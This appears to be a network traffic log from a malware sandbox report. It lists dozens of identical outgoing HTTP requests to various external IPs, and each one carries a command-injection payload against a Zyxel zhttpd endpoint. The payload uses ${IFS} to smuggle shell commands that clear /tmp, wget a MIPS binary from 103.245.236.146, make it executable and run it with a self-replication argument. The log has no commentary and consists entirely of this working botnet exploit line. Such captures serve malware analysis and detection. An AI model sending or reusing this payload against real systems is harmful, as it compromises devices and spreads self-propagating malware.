                                                        Jan 28, 2024 10:12:39.143418074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        932192.168.2.1454780217.122.59.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143451929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        933192.168.2.143531261.159.144.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143474102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        934192.168.2.145536690.1.39.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143528938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        935192.168.2.1436190107.11.250.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143568993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        936192.168.2.1441204183.169.31.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143604994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        937192.168.2.145560876.42.4.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143646002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        938192.168.2.1445030192.35.122.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143688917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        939192.168.2.145233835.223.13.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143743038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        940192.168.2.1438514143.33.159.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143783092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        941192.168.2.1436698221.117.104.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143826962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        942192.168.2.143696617.182.199.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143862009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        943192.168.2.1445636188.92.18.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143933058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        944192.168.2.1445972186.75.131.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143968105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        945192.168.2.1443244158.168.86.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143999100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        946192.168.2.1443604189.75.132.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144021988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        947192.168.2.1454026180.117.154.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144092083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        948192.168.2.1455354134.187.28.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144115925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        949192.168.2.1460604165.178.56.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144171000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        950192.168.2.1440676100.157.71.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144217014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        951192.168.2.1460928211.25.215.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144246101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        952192.168.2.144940677.58.43.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144296885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        953192.168.2.143426218.194.226.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144328117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        954192.168.2.1433430138.66.57.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144351006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        955192.168.2.1446584212.213.65.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144385099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        956192.168.2.146025878.17.250.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144429922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        957192.168.2.1451962178.240.203.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144495010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        958192.168.2.1453960152.75.159.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144510031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        959192.168.2.145123077.187.70.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144546986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        960192.168.2.145787071.166.111.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144587040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        961192.168.2.145964498.206.59.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144624949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        962192.168.2.1459588205.65.74.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144651890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        963192.168.2.145527684.27.18.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144687891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        964192.168.2.1435088198.81.186.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144722939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        965192.168.2.1440198136.149.92.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144761086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        966192.168.2.1440302148.52.174.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144782066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        967192.168.2.1439644133.133.29.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144824982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        968192.168.2.1440782143.65.190.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144860029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        969192.168.2.1444802208.153.42.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144880056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        970192.168.2.144450494.179.46.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144915104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        971192.168.2.1456890102.228.20.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.144952059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        972192.168.2.145625057.82.29.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145000935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        973192.168.2.1435348192.119.47.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145029068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        974192.168.2.1435840179.16.80.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145083904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        975192.168.2.1442946219.115.146.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145114899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        976192.168.2.1454798220.205.198.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145133018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        977192.168.2.1433472162.12.223.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145174980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        978192.168.2.14604942.112.236.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145209074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        979192.168.2.1454882107.132.34.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145256996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        980192.168.2.1433100146.166.83.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145289898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        981192.168.2.143307817.167.65.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145319939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        982192.168.2.1451698202.145.169.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145376921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        983192.168.2.1437594103.176.66.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145426989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        984192.168.2.144239289.9.177.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145452976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        985192.168.2.143798027.72.154.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145505905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        986192.168.2.144039039.195.200.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145541906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        987192.168.2.1438284174.226.5.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145581961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        988192.168.2.1451710145.187.241.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145612955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        989192.168.2.1439096202.126.14.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145643950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        990192.168.2.144607617.236.42.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145694017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        991192.168.2.1436982206.191.178.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145731926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        992192.168.2.143278271.1.22.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.145764112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


